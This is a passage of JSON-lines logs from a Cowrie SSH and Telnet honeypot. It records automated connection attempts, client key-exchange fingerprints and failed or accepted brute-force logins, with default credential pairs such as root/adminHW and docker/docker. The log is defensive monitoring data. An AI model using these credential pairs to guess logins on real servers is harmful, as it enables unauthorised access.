ha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:43:34.978817Z","src_ip":"212.227.235.229","session":"e00aa5cff811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40588,"dst_ip":"1.2.3.4","dst_port":22,"session":"a76bd76be833","protocol":"ssh","message":"New connection: 212.227.125.160:40588 (1.2.3.4:22) [session: a76bd76be833]","sensor":"my-vps","timestamp":"2025-08-31T02:43:39.104230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:43:39.541377Z","src_ip":"212.227.125.160","session":"a76bd76be833"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:43:39.542094Z","src_ip":"212.227.125.160","session":"a76bd76be833"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39890,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ac3c3a5e7a","protocol":"ssh","message":"New connection: 41.226.27.251:39890 (1.2.3.4:22) [session: 54ac3c3a5e7a]","sensor":"my-vps","timestamp":"2025-08-31T02:43:41.000179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:43:41.021658Z","src_ip":"41.226.27.251","session":"54ac3c3a5e7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:43:41.055228Z","src_ip":"41.226.27.251","session":"54ac3c3a5e7a"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:41.239101Z","src_ip":"41.226.27.251","session":"54ac3c3a5e7a"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"123456","message":"login attempt [ftptest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:41.360644Z","src_ip":"212.227.125.160","session":"a76bd76be833"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:42.387896Z","src_ip":"41.226.27.251","session":"54ac3c3a5e7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60474,"dst_ip":"1.2.3.4","dst_port":23,"session":"8eb1702cb937","protocol":"telnet","message":"New connection: 212.227.235.229:60474 (1.2.3.4:23) [session: 8eb1702cb937]","sensor":"my-vps","timestamp":"2025-08-31T02:43:42.486539Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:43:42.677143Z","src_ip":"212.227.235.229","session":"8eb1702cb937"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:43:42.698884Z","src_ip":"212.227.235.229","session":"8eb1702cb937"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:42.888621Z","src_ip":"212.227.125.160","session":"a76bd76be833"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:43:45.208954Z","src_ip":"212.227.235.229","session":"e00aa5cff811"}
{"eventid":"cowrie.session.closed","duration":"21.1","message":"Connection lost after 21.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:43:49.703145Z","src_ip":"212.227.235.229","session":"e00aa5cff811"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49742,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5ada19eb43","protocol":"ssh","message":"New connection: 41.226.27.251:49742 (1.2.3.4:22) [session: ba5ada19eb43]","sensor":"my-vps","timestamp":"2025-08-31T02:44:01.603863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:01.604846Z","src_ip":"41.226.27.251","session":"ba5ada19eb43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:44:01.653706Z","src_ip":"41.226.27.251","session":"ba5ada19eb43"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:01.799558Z","src_ip":"41.226.27.251","session":"ba5ada19eb43"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:03.008386Z","src_ip":"41.226.27.251","session":"ba5ada19eb43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44020,"dst_ip":"1.2.3.4","dst_port":22,"session":"5228b83bc98b","protocol":"ssh","message":"New connection: 212.227.125.160:44020 (1.2.3.4:22) [session: 5228b83bc98b]","sensor":"my-vps","timestamp":"2025-08-31T02:44:06.940220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:09.492370Z","src_ip":"212.227.125.160","session":"5228b83bc98b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:44:09.493130Z","src_ip":"212.227.125.160","session":"5228b83bc98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59382,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7f147c170f7","protocol":"ssh","message":"New connection: 212.227.235.229:59382 (1.2.3.4:22) [session: e7f147c170f7]","sensor":"my-vps","timestamp":"2025-08-31T02:44:17.422689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:18.222527Z","src_ip":"212.227.235.229","session":"e7f147c170f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:44:18.223306Z","src_ip":"212.227.235.229","session":"e7f147c170f7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:18.759359Z","src_ip":"212.227.125.160","session":"5228b83bc98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44280,"dst_ip":"1.2.3.4","dst_port":22,"session":"1578d0eff59d","protocol":"ssh","message":"New connection: 212.227.235.229:44280 (1.2.3.4:22) [session: 1578d0eff59d]","sensor":"my-vps","timestamp":"2025-08-31T02:44:20.012019Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":47688,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf2409da46db","protocol":"ssh","message":"New connection: 41.226.27.251:47688 (1.2.3.4:22) [session: bf2409da46db]","sensor":"my-vps","timestamp":"2025-08-31T02:44:22.152424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:22.153359Z","src_ip":"41.226.27.251","session":"bf2409da46db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:44:22.197988Z","src_ip":"41.226.27.251","session":"bf2409da46db"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:22.334519Z","src_ip":"41.226.27.251","session":"bf2409da46db"}
{"eventid":"cowrie.session.closed","duration":"16.2","message":"Connection lost after 16.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:23.157621Z","src_ip":"212.227.125.160","session":"5228b83bc98b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:23.329443Z","src_ip":"212.227.235.229","session":"1578d0eff59d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:44:23.330213Z","src_ip":"212.227.235.229","session":"1578d0eff59d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:23.618919Z","src_ip":"41.226.27.251","session":"bf2409da46db"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"12345","message":"login attempt [ftptest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:24.182542Z","src_ip":"212.227.235.229","session":"e7f147c170f7"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:25.997401Z","src_ip":"212.227.235.229","session":"e7f147c170f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47594,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e33206532ce","protocol":"ssh","message":"New connection: 212.227.125.160:47594 (1.2.3.4:22) [session: 8e33206532ce]","sensor":"my-vps","timestamp":"2025-08-31T02:44:36.508380Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49876,"dst_ip":"1.2.3.4","dst_port":22,"session":"37c73e3798bf","protocol":"ssh","message":"New connection: 212.227.125.160:49876 (1.2.3.4:22) [session: 37c73e3798bf]","sensor":"my-vps","timestamp":"2025-08-31T02:44:38.859155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:39.145736Z","src_ip":"212.227.125.160","session":"37c73e3798bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:44:39.146449Z","src_ip":"212.227.125.160","session":"37c73e3798bf"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"12345","message":"login attempt [ftptest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:40.787558Z","src_ip":"212.227.125.160","session":"37c73e3798bf"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52374,"dst_ip":"1.2.3.4","dst_port":22,"session":"4786cef6cb7c","protocol":"ssh","message":"New connection: 41.226.27.251:52374 (1.2.3.4:22) [session: 4786cef6cb7c]","sensor":"my-vps","timestamp":"2025-08-31T02:44:42.454563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:44:42.477748Z","src_ip":"41.226.27.251","session":"4786cef6cb7c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:42.484535Z","src_ip":"212.227.125.160","session":"37c73e3798bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:44:42.498691Z","src_ip":"41.226.27.251","session":"4786cef6cb7c"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-31T02:44:42.674519Z","src_ip":"41.226.27.251","session":"4786cef6cb7c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:43.921932Z","src_ip":"41.226.27.251","session":"4786cef6cb7c"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:44:58.476244Z","src_ip":"212.227.125.160","session":"8e33206532ce"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:45:02.079627Z","src_ip":"212.227.235.229","session":"1578d0eff59d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39604,"dst_ip":"1.2.3.4","dst_port":22,"session":"d823e14abd59","protocol":"ssh","message":"New connection: 41.226.27.251:39604 (1.2.3.4:22) [session: d823e14abd59]","sensor":"my-vps","timestamp":"2025-08-31T02:45:02.762424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:45:02.781556Z","src_ip":"41.226.27.251","session":"d823e14abd59"}
